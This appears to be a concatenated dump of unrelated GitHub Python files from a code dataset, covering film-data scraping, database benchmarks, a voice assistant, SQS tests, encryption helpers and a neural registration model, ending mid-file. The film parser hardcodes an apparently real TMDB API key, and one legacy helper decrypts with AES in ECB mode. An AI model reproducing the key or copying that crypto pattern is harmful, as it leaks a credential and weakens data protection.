    {url}'\n popup = folium.Popup(popup_html, max_width=250)\n folium.Marker(location=[event_lat, event_long], popup=popup, tooltip=event_city).add_to(m)\n\n # Mostrar el mapa\n folium_static(m)\n\n\n\n\n\n\n\n","repo_name":"elisagomezcambronero/Your_Music_Your_World","sub_path":"src/streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7679921792","text":"import tmdbsimple as tmdb\nfrom datetime import datetime\nfrom filmood.models import *\nfrom filmood import db\nimport json\n\n\ntmdb.API_KEY = '765b0d1f4ca8757f641c2f8e9c95c05f'\n\n# cur_id = json.load(open('filmood/parser/last_film_id.json', 'r'))[\"last_id\"]\ncur_id = 1\nvalid_film_ids = [json.loads(line)[\"id\"] for line in open(\n 'filmood/parser/movie_ids_11_26_2019.json', 'r', encoding='utf-8')]\n\namount_of_films = 0\n# amount_of_films = len(Film.query.all())\n\nwhile amount_of_films < 50000:\n try:\n movie_info = tmdb.Movies(valid_film_ids[cur_id]).info()\n film = Film(\n title = movie_info['title'],\n release_date = datetime.strptime(movie_info['release_date'], '%Y-%m-%d'),\n runtime = movie_info['runtime'],\n backdrop_path = movie_info['backdrop_path'],\n poster_path = movie_info['poster_path'],\n imdb_id = movie_info['imdb_id'],\n overview = movie_info['overview'],\n vote_average = movie_info['vote_average']\n )\n\n for genre in movie_info['genres']:\n find_genre = Genre.query.filter_by(name=genre['name']).first()\n if find_genre:\n film.genres.append(find_genre)\n else:\n new_genre = Genre(name=genre['name'])\n film.genres.append(new_genre)\n\n db.session.add(film)\n db.session.commit()\n\n amount_of_films += 1\n\n except Exception as err:\n print(err)\n\n print(cur_id)\n cur_id += 1\n # with open('filmood/parser/last_film_id.json', 'w') as file:\n # file.write(json.dumps({\"last_id\": cur_id}))\n","repo_name":"Gena20/filmood","sub_path":"filmood/parser/film_parser.py","file_name":"film_parser.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22678352935","text":"import gc\nimport pickle\nimport shutil\nfrom xmlrpc.client import FastParser\n\nimport marisa_trie\nimport pycedar\nfrom tqdm import tqdm\n\nfrom freaddb.db_lmdb import SIZE_1GB, DBSpec, FReadDB, ToBytes, profile\n\n\n@profile\ndef dict_create_save(data_file: str, limit: int):\n db = [\n dict(),\n dict(),\n ]\n for i in range(limit):\n db[0][f\"Q{i + 1}\"] = i\n db[1][i] = f\"Q{i + 1}\"\n with open(data_file + \".pkl\", \"wb\") as f:\n pickle.dump(db, f)\n del db\n\n\n@profile\ndef dict_retrieval_single(data_file, queries):\n gc.collect()\n with open(data_file + \".pkl\", \"rb\") as f:\n lmdb = pickle.load(f)\n\n for query in queries:\n item = lmdb[0].get(query)\n if item is None:\n continue\n\n assert lmdb[1].get(item) == query\n\n\n@profile\ndef trie_create_save(data_file: str, limit: int):\n qid_list = marisa_trie.Trie([f\"Q{i + 1}\" for i in range(limit)])\n qid_list.save(data_file)\n return True\n\n\n# @profile\n# def rtrie_create_save(data_file: str, limit: int):\n# keys = [f\"Q{i + 1}\" for i in range(limit)]\n# values = [tuple([i]) for i in range(limit)]\n# qid_list = marisa_trie.RecordTrie(\"I\", zip(keys, values))\n# qid_list.save(data_file)\n# return True\n\n\n# @profile\n# def rtrie_load(data_file: str):\n# qid_list = marisa_trie.RecordTrie(\"I\")\n# qid_list.load(data_file)\n# return qid_list\n\n\n@profile\ndef trie_retrieval(data_file, queries):\n gc.collect()\n trie = marisa_trie.Trie()\n trie.load(data_file)\n\n for query in queries:\n item = trie.get(query)\n if item is None:\n continue\n\n assert trie.restore_key(item) == query\n\n\n@profile\ndef lmdb_create_save(data_file: str, limit: int):\n data_schema = [\n DBSpec(name=\"qid_lid\"),\n DBSpec(name=\"lid_qid\", integerkey=True),\n ]\n db = FReadDB(\n db_file=data_file,\n db_schema=data_schema,\n buff_limit=SIZE_1GB,\n split_subdatabases=True,\n )\n for i in range(limit):\n db.add_buff(\"qid_lid\", f\"Q{i + 1}\", i, is_serialize_value=False)\n db.add_buff(\"lid_qid\", i, f\"Q{i + 1}\", is_serialize_value=False)\n\n db.save_buff()\n db.compress(print_status=False)\n db.close()\n\n\n@profile\ndef lmdb_retrieval_single(data_file, queries):\n gc.collect()\n lmdb = FReadDB(db_file=data_file, readonly=True)\n for query in queries:\n item = lmdb.get_value(\"qid_lid\", query)\n if item is None:\n continue\n assert lmdb.get_value(\"lid_qid\", item) == query\n\n\n@profile\ndef lmdb_retrieval_multi(data_file, queries):\n gc.collect()\n lmdb = FReadDB(db_file=data_file, readonly=True)\n lids = lmdb.get_values(\"qid_lid\", queries)\n lmdb.get_values(\"lid_qid\", lids)\n\n\n@profile\ndef cedar_create_save(data_file: str, limit: int):\n d_trie = pycedar.dict()\n for i in range(limit):\n d_trie.set(f\"Q{i + 1}\", i)\n d_trie.save(data_file)\n return True\n\n\n@profile\ndef cedar_load(data_file: str):\n d_trie = pycedar.dict()\n d_trie.load(data_file)\n return d_trie\n\n\n@profile\ndef cedar_retrieval_single(trie, queries):\n lids = {}\n for query in queries:\n item = trie.get(query)\n if item is None or (isinstance(item, int) and item < 0):\n continue\n\n lids[item] = query\n\n for lid, query in lids.items():\n item = trie.find_values(lid)\n for i in item:\n assert i == query\n break\n\n\n@profile\ndef cedar_retrieval_multi(trie, queries):\n lids = {}\n for query in queries:\n item = trie.get(query)\n if item is None:\n continue\n\n lids[item] = query\n\n for lid, query in lids.items():\n item = trie.restore_key(lid)\n assert item == query\n\n\ndef bench_trie_vs_lmdb(limit=100_000):\n data_file = \"/tmp/freaddb/db_test_large_qid_split_1\"\n data_file_trie = \"/tmp/freaddb/db_test_large_qid_split_2.trie\"\n shutil.rmtree(data_file, ignore_errors=True)\n shutil.rmtree(data_file_trie, ignore_errors=True)\n\n queries = [f\"Q{i}\" for i in range(limit)] # if i % 10 == 1\n dict_create_save(data_file, limit)\n dict_retrieval_single(data_file, queries)\n #\n # Test with lmdb\n lmdb_create_save(data_file, limit)\n lmdb_retrieval_single(data_file, queries)\n lmdb_retrieval_multi(data_file, queries)\n\n # Test Tries\n trie_create_save(data_file_trie, limit)\n trie_retrieval(data_file_trie, queries)\n # del qid_list\n\n # cedar_create_save(data_file_trie, limit)\n # qid_list = cedar_load(data_file_trie)\n # cedar_retrieval_single(qid_list, queries)\n\n # Test Record Trie\n # not work\n # rtrie_create_save(data_file_trie, limit)\n # rqid_list = rtrie_load(data_file_trie)\n # trie_retrieval(rqid_list, queries)\n\n\nif __name__ == \"__main__\":\n bench_trie_vs_lmdb(limit=1_000_000)\n # import dawg\n # dawg.IntDAWG({'foo': 1, 'bar': 2, 'foobar': 3})\n \"\"\"\n 100%|████████████████████████████████████████████████████████████████████████████████████| 1_000_000/1_000_000 [00:03<00:00, 308873.83it/s]\n qid_lid : 97.95% - 21.2MiB/1.0GiB\n lid_qid : 97.94% - 21.3MiB/1.0GiB\n Compressed: 97.95% - 42.5MiB/2.0GiB\n lmdb_create_save Time: 0:00:12.703496 RSS: 90.2MiB VMS: 575.7MiB\n lmdb_load Time: 0:00:00.002766 RSS: 24.0KiB VMS: 42.5MiB\n lmdb_retrieval_single Time: 0:00:05.498542 RSS: 42.6MiB VMS: 0B\n lmdb_retrieval_multi Time: 0:00:04.404589 RSS: 28.9MiB VMS: 26.0MiB\n trie_create_save Time: 0:00:00.846476 RSS: 55.0MiB VMS: 30.8MiB\n trie_load Time: 0:00:00.000551 RSS: 8.0KiB VMS: 0B\n trie_retrieval Time: 0:00:00.650987 RSS: 424.0KiB VMS: 0B\n\n trie_create_save Time: 0:00:00.912360 RSS: 77.6MiB VMS: 39.9MiB\n trie_load Time: 0:00:00.001336 RSS: 1.5MiB VMS: 0B\n trie_retrieval Time: 0:00:00.139793 RSS: 1.4MiB VMS: 0B\n 100%|████████��███████████████████████████████████████████████████████████████████████████| 1000000/1000000 [00:03<00:00, 287676.39it/s]\n qid_lid : 97.95% - 21.2MiB/1.0GiB\n lid_qid : 97.94% - 21.3MiB/1.0GiB\n Compressed: 97.95% - 42.5MiB/2.0GiB\n lmdb_create_save Time: 0:00:10.928423 RSS: 55.5MiB VMS: 26.7MiB\n lmdb_load Time: 0:00:00.001359 RSS: 24.0KiB VMS: 42.5MiB\n lmdb_retrieval_single Time: 0:00:01.310285 RSS: 42.5MiB VMS: 0B\n lmdb_retrieval_multi Time: 0:00:00.848976 RSS: 5.6MiB VMS: 2.0MiB\n\n trie_create_save Time: 0:01:31.817849 RSS: 905.5MiB VMS: 1.1GiB\n trie_load Time: 0:00:00.042253 RSS: 36.0KiB VMS: 0B\n trie_retrieval Time: 0:00:14.964123 RSS: 36.9MiB VMS: 79.0MiB\n 100%|████████████████████████████████████████████████████████████████████████████████| 100000000/100000000 [05:56<00:00, 280513.48it/s]\n qid_lid : 24.64% - 2.3GiB/3.0GiB\n lid_qid : 24.81% - 2.3GiB/3.0GiB\n Compressed: 24.72% - 4.5GiB/6.0GiB\n lmdb_create_save Time: 0:42:13.980900 RSS: 1.4GiB VMS: 9.2MiB\n lmdb_load Time: 0:00:00.005170 RSS: 536.0KiB VMS: 4.5GiB\n lmdb_retrieval_single Time: 0:02:38.491916 RSS: 5.2GiB VMS: 0B\n lmdb_retrieval_multi Time: 0:01:15.016830 RSS: 581.2MiB VMS: 260.0MiB\n --> Using trie to store \n \"\"\"\n","repo_name":"phucty/freaddb","sub_path":"scripts/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":7782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16726308344","text":"from setuptools import setup\nimport re\n\nVERSION_FILE = \"tornado_flickrapi/_version.py\"\ntry:\n vers_content = open(VERSION_FILE, \"r\").read()\n version_str = re.search(r'__version__ = \"(.+?)\"', vers_content).group(1)\nexcept:\n raise RuntimeError(\"Could not read version file.\")\n\nsetup(\n name=\"tornado-flickrapi\",\n version=version_str,\n description=\"Async Python wrapper for the Flickr API based on Tornado framework\",\n author=\"Dmitriy Bryndin\",\n author_email=\"bryndin@gmail.com\",\n url=\"https://github.com/bryndin/tornado_flickrapi\",\n packages=[\"tornado_flickrapi\"],\n install_requires=[\n \"oauth\",\n \"tornado\",\n ],\n license=\"BSD License\",\n)\n","repo_name":"bryndin/tornado-flickr-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20955870657","text":"import xbmc\nimport xbmcvfs\nimport Folder\nimport urllib\nimport urlparse\n\n\nNAME_QUERY = 'fileName'\nFOLDER_NAME_QUERY = 'folderName'\nFOLDER_PATH_QUERY = 'folderPath'\n\n\n\n\n\n\nclass File(object):\n def __init__(self, name, folder):\n self.name = name\n self.folder = folder\n self.path = folder.fullpath\n self.fullpath = folder.fullpath + '/' + name\n \n if '.' in name:\n self.soleName, self.extension = name.split('.', 1)\n else:\n self.soleName = name\n self.extension = None\n \n \n self._pathTranslated = None\n self._fullpathTranslated = None\n \n \n def exists(self):\n return xbmcvfs.exists(self.fullpath)\n \n def delete(self):\n xbmcvfs.delete(self.fullpath)\n \n \n def deleteIfExists(self):\n if self.exists():\n self.delete()\n \n \n def pathTranslated(self):\n return self.folder.fullpathTranslated()\n \n \n \n def fullpathTranslated(self):\n if self._fullpathTranslated is None: \n self._fullpathTranslated = xbmc.translatePath(self.fullpath)\n \n return self._fullpathTranslated\n \n \n \n def fileHandler(self, write=False):\n if write:\n permission = 'w'\n else:\n permission = 'r'\n \n fullpath = self.fullpathTranslated()\n return xbmcvfs.File(fullpath, permission)\n \n def contents(self):\n fh = self.fileHandler();\n \n contents = fh.read()\n fh.close()\n \n return contents\n \n \n def lines(self):\n contents = self.contents()\n return contents.split('\\n')\n \n \n def write(self, contentsStr):\n fh = self.fileHandler(write=True)\n fh.write(contentsStr)\n fh.close()\n \n \n \n def encodedQuery(self):\n query = urllib.urlencode({NAME_QUERY: self.name,\n FOLDER_NAME_QUERY: self.folder.name,\n FOLDER_PATH_QUERY: self.folder.path\n })\n \n \n \n return query\n \n \n def dumpObject(self, dumpObject):\n import dill as pickle\n \n with open(self.fullpathTranslated(), 'wb') as f:\n pickle.dump(dumpObject, f)\n \n \n def loadObject(self):\n import dill as pickle\n \n with open(self.fullpathTranslated(),'rb') as f:\n loadedObject = pickle.load(f)\n \n return loadedObject\n\n\n\n\n \n \n\ndef fromQuery(query):\n parsedQuery = urlparse.parse_qs(query)\n \n name = parsedQuery[NAME_QUERY][0]\n folderName = parsedQuery[FOLDER_NAME_QUERY][0]\n folderPath = parsedQuery[FOLDER_PATH_QUERY][0]\n \n folder = Folder.Folder(folderName, folderPath)\n newFile = File(name, folder)\n \n return newFile\n \n \n \n \n \ndef fromFullpath(fullpath):\n folderPath, folderName, fileName = fullpath.rsplit('/', 2)\n \n folder = Folder.Folder(folderName, folderPath)\n newFile = File(fileName, folder)\n \n return newFile\n\ndef fromNameAndDir(fileName, dirPath):\n folder = Folder.fromFullpath(dirPath)\n newFile = File(fileName, folder)\n \n return newFile\n\ndef fromInvalidNameAndDir(originalName, dirPath):\n import utils\n \n name = utils.createValidName(originalName)\n return fromNameAndDir(name, dirPath) \n\n\ndef loadObjectFromFP(fullpath):\n dumpFile = fromFullpath(fullpath)\n return dumpFile.loadObject()","repo_name":"SportySpice/Collections","sub_path":"src/file/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"39989465955","text":"#########################################\n# NORA\n# Nora is a voice assistant built on simplicity.\n# Commands are added to a queue by by the user giving a verbal\n# command (ex. \"Nora, what's the weather?\") or via the web\n# interface. Commands are processed in the order received.\n#########################################\nfrom core_utils.core_core.channels import Channels\nfrom core_utils.core_core.settings_manager import SettingsManager\nfrom core_utils.settings_tool import SettingsTool\nimport core_utils.intent_parser as intent_parser\nimport core_utils.skill_creator as skill_creator\nfrom core_utils.audio_utils import AudioUtils\nfrom core_utils.wakeword import Wakeword\nfrom core_utils.server import create_server\nfrom threading import Thread, Event\nimport queue\n\n\n#######################\n# Threading\n#######################\nspeech_queue = queue.Queue()\nshutdown_event = Event()\n\n\ndef consume_input():\n \"\"\" Consumes the input from the queue. \n Returns True if the exit command was received. \"\"\"\n text = speech_queue.get()\n if shutdown_event.is_set():\n return\n intent_data = intent_parser.parse_intent(text)\n\n # run the intent\n if intent_data is not None:\n intent_data[\"callback\"](intent_data)\n else:\n audio_utils.say(\"No intent detected\")\n\n\ndef await_wakeword_thread():\n \"\"\" Thread for the wakeword.\n Loops and waits for the wakeword to be spoken. When it is,\n it grabs the user's command.\n \"\"\"\n while not shutdown_event.is_set():\n wakeword.await_wakeword(shutdown_event=shutdown_event)\n if shutdown_event.is_set():\n break\n\n print(\"Listening...\")\n text = audio_utils.listen()\n if text is not None:\n print(\"You said: \" + text)\n speech_queue.put(text)\n\n\ndef shutdown_system(message=None):\n \"\"\" Shuts down the system. \"\"\"\n print(\"Save settings\")\n settings_manager.save_settings()\n shutdown_event.set()\n\n\n\n#######################\n# Setup\n#######################\nchannels = Channels()\nsettings_manager = SettingsManager()\n\n# initialize audio utilities\naudio_utils_settings_tool = SettingsTool(settings_manager, setting_path=\"audio_utils\")\naudio_utils = AudioUtils(settings_tool=audio_utils_settings_tool, channels=channels)\n\n# import the skills\nskills = skill_creator.import_skills(settings_manager=settings_manager, channels=channels, audio_utils=audio_utils)\n\n# initialize the intent parser\nintent_settings_tool = SettingsTool(settings_manager=settings_manager,\n setting_path='intent parser')\nintent_parser = intent_parser.IntentParser(skills,\n settings_tool=intent_settings_tool, channels=channels,)\n\n# initialize wakeword\nwakeword_settings_tool = SettingsTool(settings_manager=settings_manager,\n setting_path='wakeword.picovoice')\nwakeword = Wakeword(settings_tool=wakeword_settings_tool,\n audio_utils=audio_utils)\n\n#get the name of the assiantat\nname = settings_manager.get_setting(\"name\", \"Carmen\")\n\nchannels.subscribe(shutdown_system, 'system')\n\n# calibrating audio\nprint(\"Calibrating...\")\naudio_utils.calibrate_silence()\nprint(\"Calibration complete!\")\n\n\n# CTRL+C handler\nimport signal\nimport sys\n\ndef signal_handler(sig, frame):\n print('You pressed Ctrl+C!')\n shutdown_system()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# Launch the server\nserver = create_server(channels=channels, settings_manager=settings_manager)\n\n########################################\n# main loop\n########################################\nwith server.run_in_thread():\n # startup fanciness\n name = settings_manager.get_setting(\"name\")\n audio_utils.say(f\"Hello, I am {name}. I am a virtual assistant.\")\n\n # start the wakeword thread\n wakeword_thread = Thread(target=await_wakeword_thread)\n wakeword_thread.start()\n\n # start the main loop\n while not shutdown_event.is_set():\n consume_input()\n\n# stop any system threads\nwakeword_thread.join(1)","repo_name":"aamott/Nora-Voice-Assistant","sub_path":"nora.py","file_name":"nora.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38469997980","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport boto\nimport pytest\nimport simplejson\nfrom mock import MagicMock\n\nfrom amira.sqs import SqsHandler\nfrom amira.sqs import SqsQueueNotFoundException\n\n\nTEST_DATA_DIR_PATH = 'tests/data'\n\n\n@pytest.fixture\ndef mock_sqs_queue():\n boto.sqs.connect_to_region = MagicMock()\n sqs_connection_mock = boto.sqs.connect_to_region.return_value\n return sqs_connection_mock.get_queue.return_value\n\n\ndef read_s3_event_notifications_file(s3_event_notifications_file_path):\n with open(s3_event_notifications_file_path) as fp:\n s3_event_notifications = simplejson.load(fp)\n json_s3_event_notifications = [\n simplejson.dumps(s3_event_notification)\n for s3_event_notification in s3_event_notifications\n ]\n return json_s3_event_notifications\n\n\ndef create_s3_event_notification_message_mocks(\n s3_event_notifications_file_name):\n \"\"\"Creates SQS queue message mocks that will return the JSON content of\n `s3_event_notifications_file_path` JSON file as the body of the message.\n \"\"\"\n s3_event_notifications_file_path = '{0}/{1}'.format(\n TEST_DATA_DIR_PATH, s3_event_notifications_file_name)\n json_s3_event_notifications = read_s3_event_notifications_file(\n s3_event_notifications_file_path)\n s3_event_notification_message_mocks = [\n MagicMock(**{'get_body.return_value': json_s3_event_notification})\n for json_s3_event_notification in json_s3_event_notifications]\n return s3_event_notification_message_mocks\n\n\ndef mock_s3_event_notifications(\n mock_sqs_queue, s3_event_notifications_file_name):\n \"\"\"`SqsHandler.get_created_objects()` is a generator, so we need to\n mock multiple values returned by `get_messages()` method.\n In this case only one as the test cases do not operate on more than\n one message.\n \"\"\"\n s3_event_notification_message_mocks = \\\n create_s3_event_notification_message_mocks(\n s3_event_notifications_file_name)\n mock_sqs_queue.get_messages.side_effect = \\\n [s3_event_notification_message_mocks]\n return s3_event_notification_message_mocks\n\n\nclass TestSqsHandler():\n\n def test_queue_not_found(self):\n boto.sqs.connect_to_region = MagicMock()\n sqs_connection_mock = boto.sqs.connect_to_region.return_value\n sqs_connection_mock.get_queue.return_value = None\n\n with pytest.raises(SqsQueueNotFoundException) as e:\n SqsHandler('us-west-1', 'godzilla')\n\n assert 'SQS queue godzilla not found.' == str(e.value)\n boto.sqs.connect_to_region.assert_called_once_with('us-west-1')\n sqs_connection_mock.get_queue.assert_called_once_with('godzilla')\n\n def test_get_created_objects(self, mock_sqs_queue):\n s3_event_notification_message_mocks = mock_s3_event_notifications(\n mock_sqs_queue, 's3_event_notifications.json')\n sqs_handler = SqsHandler('us-west-1', 'godzilla')\n created_objects = sqs_handler.get_created_objects()\n actual_key_names = [created_object.key_name\n for created_object in created_objects]\n\n expected_key_names = [\n 'AMIRA-1561-2016_01_11-10_54_07.tar.gz',\n 'AMIRA-1562-2016_01_11-10_54_47.tar.gz',\n 'AMIRA-1563-2016_01_11-10_54_58.tar.gz',\n 'AMIRA-1564-2016_01_11-10_55_12.tar.gz',\n 'AMIRA-1565-2016_01_11-10_55_32.tar.gz',\n 'AMIRA-1566-2016_01_11-10_55_49.tar.gz',\n 'AMIRA-1567-2016_01_11-10_56_09.tar.gz'\n ]\n assert expected_key_names == actual_key_names\n\n mock_sqs_queue.delete_message_batch.assert_called_once_with(\n s3_event_notification_message_mocks)\n\n def test_get_created_objects_no_created_objects(self, mock_sqs_queue):\n mock_sqs_queue.get_messages.side_effect = [[]]\n\n sqs_handler = SqsHandler('us-west-1', 'godzilla')\n created_objects = sqs_handler.get_created_objects()\n assert 0 == len(list(created_objects))\n\n assert mock_sqs_queue.delete_message_batch.called is False\n\n def test_get_created_objects_no_records(self, mock_sqs_queue):\n \"\"\"Tests the behavior of `get_created_objects()` method in case\n the message received from SQS does not contain the \"Records\"\n field in the message body.\n \"\"\"\n mock_s3_event_notifications(\n mock_sqs_queue, 's3_test_event_notification.json')\n\n sqs_handler = SqsHandler('us-west-2', 'godzilla')\n created_objects = sqs_handler.get_created_objects()\n created_objects = list(created_objects)\n assert [] == created_objects\n","repo_name":"padfoot999/amira","sub_path":"tests/sqs_test.py","file_name":"sqs_test.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13878790012","text":"class Army:\n def __init__(self):\n self.name=\"Anamika\"\n self.gn=self.Gun() # inner class object\n def show(self):\n print(\"Name :\",self.name) \n\n class Gun:\n def __init__(self):\n self.name=\"AK47\" \n self.capacity=\"75 rounds\"\n self.length='34.3 In'\n\n def disp(self):\n print(\"Gun Name :\",self.name)\n print(\"Gun Capacity :\",self.capacity)\n print(\"Gun Length :\",self.length)\n\na=Army()\nprint('Outer Class variable and method')\nprint(a.name)\na.show()\nprint('Inner Class variable and method')\nprint(a.gn.name)\na.gn.disp()\ng=a.gn\nprint(g.capacity)\n\n# we can also crete object of inner class\ng=Army().Gun()\nprint(g.length)","repo_name":"anamikagupta17/Python","sub_path":"advance/nestedClass.py","file_name":"nestedClass.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21524108950","text":"def fun(s):\n # return True if s is a valid email, else return False\n\n if s.count('@') != 1 or s.count('.') != 1:\n return False\n\n username, domain = s.split('@')\n website, extension = domain.split('.')\n \n if (not len(username) > 0) or (not len(website) > 0):\n return False\n\n for i in range(len(username)):\n if username[i].isalpha() or username[i].isdigit() or username[i] == '_' or s[i] == '-':\n continue\n else:\n return False\n \n for i in range(len(website)):\n if domain[i].isalpha() or domain[i].isdigit():\n continue\n else:\n return False\n \n if 1 < len(extension) <= 3:\n for i in range(len(extension)):\n if extension[i].isalpha():\n continue\n else:\n return False\n else: return False\n\n return True\n\ndef filter_mail(emails):\n return list(filter(fun, emails))\n\nif __name__ == '__main__':\n n = int(input())\n emails = []\n for _ in range(n):\n emails.append(input())\n\nfiltered_emails = filter_mail(emails)\nfiltered_emails.sort()\nprint(filtered_emails)","repo_name":"uki-a/hackerrank","sub_path":"validating_email.py","file_name":"validating_email.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38123507111","text":"import base64\nimport logging\nimport traceback\n\nfrom Crypto.Cipher import AES\nfrom cryptography.fernet import Fernet\n\nlog = logging.getLogger(\"formshare\")\n\n\ndef old_decode_data_with_key(data, key): # pragma: no cover\n \"\"\"\n Old decode code based on PyCrypto. Here only to migrate 2.0.0 versions\n of FormShare to new versions\n :param data: Data to encrypt\n :param key: Key to use\n :return:\n \"\"\"\n byte_padding = b\"|\"\n\n def decode_aes(c, e):\n return c.decrypt(base64.b64decode(e)).rstrip(byte_padding)\n\n cipher = AES.new(key, 1)\n return decode_aes(cipher, data)\n\n\ndef encode_data(request, data):\n key = request.registry.settings[\"aes.key\"].encode()\n key = base64.b64encode(key)\n f = Fernet(key)\n if not isinstance(data, bytes):\n data = data.encode()\n return f.encrypt(data)\n\n\ndef decode_data(request, data):\n key = request.registry.settings[\"aes.key\"].encode()\n key = base64.b64encode(key)\n f = Fernet(key)\n try:\n return f.decrypt(data)\n except Exception as e:\n log.error(\"Error when decrypting a password. Error: {}\".format(str(e)))\n return \"\"\n\n\ndef encode_data_with_key(data, key):\n key = base64.b64encode(key)\n f = Fernet(key)\n if not isinstance(data, bytes):\n data = data.encode()\n return f.encrypt(data)\n\n\ndef decode_data_with_key(data, key):\n key = base64.b64encode(key)\n f = Fernet(key)\n try:\n return f.decrypt(data)\n except Exception as e:\n log.error(\"Error when decrypting a password. Error: {}\".format(str(e)))\n log.error(traceback.format_exc())\n return \"\"\n","repo_name":"qlands/FormShare","sub_path":"formshare/config/encdecdata.py","file_name":"encdecdata.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"74556397286","text":"from flask import Flask, request, jsonify\nfrom flask.ext.pymongo import PyMongo\napp = Flask(__name__)\n\napp.config['MONGO_DBNAME'] = 'sensor_monitor'\napp.config['MONGO_URI'] = 'mongodb://:@ds259325.mlab.com:59325/sensor_monitor'\n\nmongo = PyMongo(app)\n\n@app.route(\"/\")\ndef hello():\n return \"

    Hello There!

    \"\n\n@app.route('/add',methods=['POST'])\ndef add():\n content = request.json\n var1 = content['var1']\n var2 = content['var2']\n print(\"var1\", var1)\n print(\"var2\", var2)\n\n if var1 and var2:\n user = mongo.db.users\n user.insert({'var1': var1, 'var2': var2})\n return jsonify({'success': '1'})\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"alejocram/SensorMonitorServer","sub_path":"sensor_monitor.py","file_name":"sensor_monitor.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27726659840","text":"import torch\nimport torch.nn as nn\n\nfrom models.conv_lstm import ConvLSTM\nfrom models.unet import Unet\nfrom utils.spatial_transform import SpatialTransformer\n\n\nclass Unet_ConvLSTM(nn.Module):\n def __init__(self, image_size):\n super(Unet_ConvLSTM, self).__init__()\n self.image_size = image_size\n self.ndims = len(image_size)\n\n enc_nf = [16, 32, 32, 32]\n dec_nf = [32, 32, 32, 32, 32, 16, 16]\n self.unet = Unet(inshape=image_size, infeats=2, nb_features=[enc_nf, dec_nf])\n\n # configure unet to flow field layer\n Conv = getattr(nn, 'Conv%dd' % self.ndims)\n self.flow = Conv(self.unet.final_nf, self.ndims, kernel_size=3, padding=1)\n\n self.rnn = ConvLSTM(input_dim=2, hidden_dim=2, kernel_size=(3, 3), num_layers=1, batch_first=False)\n self.spatial_transformer = SpatialTransformer(size=image_size)\n\n def forward(self, images, labels=None):\n\n # shape of imgs/lbs: (seq_size, bs, 1, W, H)\n # shape of unet_out: (seq_size - 1, bs, 2, W, H)\n unet_out = torch.cat(\n [self.flow(self.unet(torch.cat([src, trg], dim=1))).unsqueeze(0)\n for src, trg in zip(images[:-1], images[1:])], dim=0)\n\n rnn_out, last_states = self.rnn(unet_out)\n h, c = last_states[0]\n\n # shape of flows: (seq_size - 1, bs, 2, W, H)\n flows = rnn_out[0].permute(1, 0, 2, 3, 4)\n\n # shape of moved_images = (seq_size - 1, bs, 1, W, H)\n moved_images = torch.cat(\n [self.spatial_transformer(src, flow).unsqueeze(0) for src, flow in zip(images[:-1], flows[:])], dim=0)\n\n if labels is not None:\n moved_labels = torch.cat(\n [self.spatial_transformer(src, flow).unsqueeze(0) for src, flow in zip(labels[:-1], flows[:])], dim=0)\n return [moved_images, moved_labels, flows]\n else:\n return [moved_images, flows]\n","repo_name":"Armin-Saadat/rnn-registration-old","sub_path":"models/unet_convlstm.py","file_name":"unet_convlstm.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"29536483767","text":"import argparse\nfrom pathlib import Path\nfrom algorithms import Search_Algorithms as sa\n\n'''\nEach variable read in from *.var will be put into a dictionary. \nThe domain, constraint relationships, and number of constraints can be accessed by provided the letter as the key in any dict.\n'''\n\n\ndef main():\n # Command Line Parser\n parser = argparse.ArgumentParser()\n # Positional Arguments\n parser.add_argument(\"variables\",\n help=\"Path to a .var file that holds variable info\",\n type=Path\n )\n parser.add_argument(\"constraints\",\n help=\"Path to a .con file that holds constraint info\",\n type=Path\n )\n parser.add_argument(\"consistency_enforcing\",\n help=\"none|fc are the choices. none is for backtracking. fc is for forward checking.\"\n )\n # Parse input\n args = parser.parse_args()\n\n # Getting variable data from .var file if path exists\n if args.variables.exists() and args.variables.is_file():\n # Looping thru file\n domains = {} # Holds domain of each variable\n letters = {} # Holds letter for each, to be used with constraints. Value is a number to be used like an index\n with args.variables.open() as f:\n for idx, line in enumerate(f):\n v = line.split()\n l = v.pop(0).split(\":\").pop(0) # Removing first element, then getting the letter\n letters[l] = idx\n v = [int(x) for x in v] # Converting all ints from string to int TODO optimize\n domains[l] = v\n else:\n print(\"Please provide a .var file that exists. Make sure you are not just providing a directory.\")\n exit()\n\n # Getting constraint data from .var file if path exists\n if args.constraints.exists() and args.constraints.is_file():\n # Looping thru file\n constraints = {} # Holds constraint relationships\n for l in letters:\n t = []\n for i in letters:\n t.append(0)\n constraints[l] = t # put in a list with len equal to amount of letters into dict value\n with args.constraints.open() as f:\n for line in f:\n cons = line.split()\n if cons[0] in letters and cons[2] in letters: \n left_key = cons[0] # Key for dict\n right_key = cons[2]\n left_index = 